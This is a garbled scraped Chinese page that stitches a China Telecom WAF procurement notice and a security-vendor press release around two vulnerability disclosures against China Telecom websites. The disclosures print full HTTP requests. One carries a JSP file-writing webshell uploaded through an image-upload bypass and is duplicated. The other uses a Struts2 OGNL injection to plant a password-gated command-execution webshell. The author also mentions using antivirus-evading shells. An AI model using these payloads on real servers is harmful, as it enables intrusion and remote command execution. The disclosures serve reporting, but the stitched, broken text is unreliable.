电信网络交费waf怎样在网络上交费

中国电信股份有限公司安徽分公司WAF设备采购询价公告-中国采购与招标网(.cn)
服务热线400-006-6655
您当前的位置:
中国电信股份有限公司安徽分公司WAF设备采购询价公告
中国电信股份有限公司安徽分公司WAF设备采购询价公告
中国采购与招标网
以下内容,仅对会员开放,如需查看详细内容,请先
成为会员,已注册的会员请
招标编号:请
开标时间:请
招标人&&:请
标讯类别:请
资金来源:请
招标代理:请
项目概述:招标代理公司( 查看)受业主单位( 查看) 委托,于在中国采购与招标网发布 中国电信股份有限公司安徽分公司WAF设备采购询价公告。现邀请全国供应商参与投标,有意向的单位请及时联系项目联系人参与投标。
X受中X(以下简称采购人)委X安徽X公司WAF设备采购】项目所需的货物及服务进行询价采购,具有提X均可前来询价。
WAF设备采购项目不划X标包,采购预估总金额约XX人民币。
采购产品名称
预算总价(X)
<spX安徽X公司WAF设备采购项目
见“第五章采购需求”
二、★资格要求
(一)报价人基本资格要求
报价人应为中华人民共和国境内(不含香X)法律上和财务上独立的法人或依法登记注册的组织,合法运作并独立于采购人和采购代理机构。报价人应具有良好的银行资信和商业信誉。注册资本或开办资金应不低于XX(含)人民币(如注册资本或开办资金为其他外币的,按照报价文件递交截止之日中国人民银行X场人民币汇率中间价折算为等值人民币),对于已按商事登记改革要求更换新版营业执照的,应提供商事主体信息最新查询结果(显示经营范围、注册资本等信息)的截屏。
报价人的法定代表人或负责人为同一人或者存在控股、管理关系的不同报价人,不得参加同一标包询价或者未划X标包的同一询价项目报价。
报价人应提供一般纳税人证明,或承诺X安徽X公司要求的X%增值税发票。一般纳税人证明材料如:加盖一般纳税人条形章的税务登记证副本、增值税一般纳税人申请认定表或其他证明材料。
本次询价不接受联合体报价申请。
本次询价接受代理商报价申请,代理商需提供制造商出具的针对本项目报价产品授权函复印件(原件备查)。
(二)报价人不得存在下列情形之一:
报价人被责令停业或破产状态的;
报价人被暂停或取消报价资格的;
报价人财产被重组、接管、查封、扣押或冻结的;
报价人在最近三年内有违法行为或被媒体曝光且在社会上造成恶劣影响的;
报价人在最近三年内严重违反合同约定的;
报价人在最近三年内有骗取成交的;
报X投标、询价等活动中没有发生质量问题、无故弃标行为、交付严重滞后的;
报价人在服务过程中出现过重大事故且未妥善解决的。
(三)报价产品资格要求
报价产品应是来自中华人民共和国【或是与中华人民共和国有正常贸易X】的产品。
报价产品应符合行业相关技术要求。
三、获取询价文件
凡符合资格要求的报价人,请持法人单位有效证书复印件(加盖单位章)/单位介绍信于X年3月9日至X年3月X日,北京时间每日上午(8时XX至X时XX),下午(X时XX至X时XX)向采购代理机构了解有关信息并购买询价文件。
询价文件售价人民币XX(¥X),售后不退。
购买询XXX号X招投标中X四楼西。
询价文件如需邮寄,需要以书面形式通知采购代理机构,采购代理机构在收款后2日内寄出。
本次发售不接受现金,请银行转账或者现金存柜,并在凭证上注明报价人名称、项目编号(ZBX)及用途、金额。
四、报价文件的递交
本次唱价将于上述报价文件递交截止XXX号安徽电信规划设X开标室公开进行,并邀请报价人的法定代表人或其委托的代理人参加。
五、发布公告的媒介
本次公告只在中国采购与招标网()X(http://X.X.X.XX/ESCM/account/login.do)上发布,其他媒体转载无效。
六、联系方式:
采购X安徽X公司
采购代理机构名称:X
采购代XXX号
联系人:Xan lang="EN-US">
电子邮件: X
采购代理机构:X
中标公示:
免费注册会员 可以查看 免费 信息
目前合作业主、代理机构 8511 家 了解更多服务内容 请进入
每日合作单位发布信息 10000余
条 会员服务咨询电话:010-
查看信息详情请您登录或注册
信息详情内容包含招标单位名称、地址、招标项目的性质、数量,实施地点和时间,以及获取招标文件的办法等各项内容。
您在使用本网过程中,需要帮助,可以拨下面的电话。
会员办理咨询:400-006-6655 转 1业务咨询:400-006-6655 转 1
售后服务:400-006-6655 转 2发布信息:400-006-6655 转 3
记住用户名
Copyright (C)
中国采购与招标网
Rights Reserved 京ICP备号 北京市公安局海淀分局备案编号
本站网络实名/通用网址:"中国采购与招标网"
业务咨询:400-006-6655 转 1 ; 售后服务:400-006-6655 转 2
发布信息:400-006-6655 转 3 ; 广告热线:86-010-分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
证明getshell
详细说明:
地址:http://**.**.**.**/res/active/4G/upload.jsp (需要登录) 上传漏洞 还装有安全软件
所以把我马子全杀了
但是 这都不是重点 重点是拿了免杀
先来个上传小马
code 区域POST http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 1912
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0. Safari/537.36 QIHU 360EE
Content-Type: multipart/form- boundary=----WebKitFormBoundarytrI8QHebOAmXLH47
Referer: http://**.**.**.**/service/upload/img_upload.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8
Cookie: s_fid=7BC739F-08481DCFE53A3A4E; lvid=1d399cca6c35ee4ff517; nvid=1; cityCode= SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!; _pk_ref.345.%22%2C%22%22%2C%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df7b5c9fe%22%2C%220%22%5D; Hm_lvt_4ae1fc63cbdccf4a2e47a=; Hm_lpvt_4ae1fc63cbdccf4a2e47a=; _pk_id.345.1592=c1efce5..1...; _pk_ses.345.1592=*
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&uploadFile&; filename=&240.php&
Content-Type: image/jpeg
& contentType=&text/ charset=GBK& import=&**.**.**.**.*;&%&
&title&1&/title&
&body bgcolor=&#ffffff&&
String path=request.getParameter(&path&);
String content=request.getParameter(&content&);
String url=request.getRequestURI();
String relativeurl=url.substring(url.indexOf(&#039;/&#039;,1));
String absolutepath=application.getRealPath(relativeurl);
if (path!=null && !path.equals(&&) && content!=null && !content.equals(&&))
File newfile=new File(path);
PrintWriter writer=new PrintWriter(newfile);
writer.println(content);
writer.close();
if (newfile.exists() && newfile.length()&0)
out.println(&&font size=3 color=red&1!&/font&&);
out.println(&&font size=3 color=red&2!&/font&&);
}catch(Exception e)
e.printStackTrace();
out.println(&&form action=&+url+& method=post&&);
out.println(&&font size=3&1:&br&&/font&&input type=text size=54 name=&#039;path&#039;&&br&&);
out.println(&&font size=3 color=red&1&+absolutepath+&&/font&&br&&);
out.println(&&textarea name=&#039;content&#039; rows=15 cols=100&&/textarea&&br&&);
out.println(&&input type=&#039;submit&#039; value=&#039;1!&#039;&&);
out.println(&&/form&&);
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&fileName&
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&filePath&
C:\fakepath\240.jpg
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&comments&
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&rela_no&
------WebKitFormBoundarytrI8QHebOAmXLH47--
小马地址:http://**.**.**.**/temp/res/upload//images/55.jsp
这里需要注意的是 小马获取的地址是假地址
还好上传的时候返回了真实地址
/home/weblogic/Oracle/Middleware/wssnet/temp/res/upload//images/
上传大马 也要找个免杀马
http://**.**.**.**/temp/res/upload//images/55.jsp
到了这里就不深入了 我怕被打
万一开发来我家打我怎么办
漏洞证明:
修复方案:
验证上传文件
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:12
确认时间: 11:13
厂商回复:
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先中国电信江西主站可被getshell过waf
证明getshell
地址:http://**.**.**.**/res/active/4G/upload.jsp (需要登录) 上传 还装有安全软件 所以把我马子全杀了
但是 这都不是重点 重点是拿了免杀
先来个上传小马
POST http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload. HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 1912
Cache-Control: max-age=0
Accept: text/,application/xhtml+xml,application/q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0. Safari/537.36 QIHU 360EE
Content-Type: multipart/form- boundary=----WebKitFormBoundarytrI8QHebOAmXLH47
Referer: http://**.**.**.**/service/upload/img_upload.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8
Cookie: s_fid=7BC739F-08481DCFE53A3A4E; lvid=1d399cca6c35ee4ff517; nvid=1; cityCode= SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!; _pk_ref.345.%22%2C%22%22%2C%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df7b5c9fe%22%2C%220%22%5D; Hm_lvt_4ae1fc63cbdccf4a2e47a=; Hm_lpvt_4ae1fc63cbdccf4a2e47a=; _pk_id.345.1592=c1efce5..1...; _pk_ses.345.1592=*
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&uploadFile&; filename=&240.php&
Content-Type: image/jpeg
String path=request.getParameter(&path&);
String content=request.getParameter(&content&);
String url=request.getRequestURI();
String relativeurl=url.substring(url.indexOf(&#039;/&#039;,1));
String absolutepath=application.getRealPath(relativeurl);
if (path!=null && !path.equals(&&) && content!=null && !content.equals(&&))
File newfile=new File(path);
PrintWriter writer=new PrintWriter(newfile);
writer.println(content);
writer.close();
if (newfile.exists() && newfile.length()&0)
out.println(&1!&);
out.println(&2!&);
}catch(Exception e)
e.printStackTrace();
out.println(&&);
out.println(&1:
out.println(&1&+absolutepath+&
out.println(&
out.println(&&);
out.println(&&);
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&fileName&
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&filePath&
C:\fakepath\240.jpg
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&comments&
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form- name=&rela_no&
------WebKitFormBoundarytrI8QHebOAmXLH47--
&%@page contenttype=&text/ charset=GBK& import=&**.**.**.**.*;&&
小马地址:http://**.**.**.**/temp/res/upload//images/55.jsp
这里需要注意的是 小马获取的地址是假地址 还好上传的时候返回了真实地址
/home/weblogic//Middleware/wssnet/temp/res/upload//images/
上传大马 也要找个免杀马
http://**.**.**.**/temp/res/upload//images/55.jsp 密码 123
到了这里就不深入了 我怕被打 万一开发来我家打我怎么办
解决方案:
验证上传文件
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
继上次广东电信政企客户系统可命令执行并getshell未被审核通过之后,发现手机商城也存在命令执行的问题,搞不好还有其他系统受害.....
详细说明:
访问广东电信官网:http://**.**.**.**/, 点击“天翼商城订单”,如图:
抓包,并修改为POST提交(获取服务器部署地址):
code 区域POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (M Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%2F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD617D1698148; looyu_id=991fe062faebd4ce82c94ba27_; Hm_lvt_e1acdde81d0b416afd00f2f=,; Hm_lpvt_e1acdde81d0b416afd00f2f=; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=2; ijg_s=More%20than%207%20 i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst. i_url=%5B%5BB%5D%5D; i_cc= TS2c9cf1=9fe84fa7fcf2dfab51dda02e9c3c71891c; adslAccount=; i_ppv=63; ecss_identity=; looyu_39415=v%3A279afCref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form- boundary=------------------------c68721
Content-Length: 258
--------------------------c68721
Content-Disposition: form- name=&redirect:/${#context.get(&com.opensymphony.xwork2.dispatcher.HttpServletRequest&).getRealPath(&/&)}&
--------------------------c68721
执行效果:
接下来写入小的webshell(excuteMingl.jsp):
code 区域POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (M Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%2F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD617D1698148; looyu_id=991fe062faebd4ce82c94ba27_; Hm_lvt_e1acdde81d0b416afd00f2f=,; Hm_lpvt_e1acdde81d0b416afd00f2f=; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=2; ijg_s=More%20than%207%20 i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst. i_url=%5B%5BB%5D%5D; i_cc= TS2c9cf1=9fe84fa7fcf2dfab51dda02e9c3c71891c; adslAccount=; i_ppv=63; ecss_identity=; looyu_39415=v%3A279afCref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form- boundary=------------------------c68721
Content-Length: 604
--------------------------c68721
Content-Disposition: form- name=&redirect:/${&x&+(new **.**.**.**.PrintWriter(&/home/ecss/emallTelWeb8082/webapps/emallTelWeb/excuteMingl.jsp&)).append(&&%if(\&023\&.equals(request.getParameter(\&pwd\&))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\&i\&)).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\&&pre&\&)\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\&&/pre&\&)\u003b}%&&).close()}&
--------------------------c68721
发现执行成功:
漏洞证明:
访问刚刚写入的webshell:
code 区域http://**.**.**.**/emallTelWeb/excuteMingl.jsp
修复方案:
struts2赶紧升级最新版本吧
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:11
确认时间: 18:28
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先启明星辰WAF产品入围电信集采  来源:  作者:
近日,启明星辰Web应用防火墙产品全线入围中国电信集采项目,涉及低中高端各种型号,覆盖全系列产品。
据了解,启明星辰WAF在三个方面技术表现突出。高性能: 入围WAF产品性能均高于集采WAF技术要求,在IPv4和IPv6网络环境下性能相同,不会因为切换到IPv6导致性能损耗。IPv6检测:入围WAF产品全面支持IPv6网络环境下攻击检测,满足用户下一代网络的平滑升级。算法检测:入围WAF产品核心功能采用算法检测,从测试结果分析,优于传统WAF特征检测机制,能够抵御未知SQL注入和XSS注入攻击。
启明星辰作为中国信息安全行业的领航企业,拥有完整的网络安全产品及解决方案,包括下一代防火墙、入侵检测防护系统、UTM、抗DDoS攻击系统等。适应从小型企业到大型云数据中心、运营商网络等各种规模和客户业务模型下的网络环境。在国内运营商领域,启明星辰的安全产品已服务运营商10余年,并广泛应用于金融、政府、能源、大企业等行业领域。关键词:

我要回帖

更多关于 电信交话费 的文章

 

随机推荐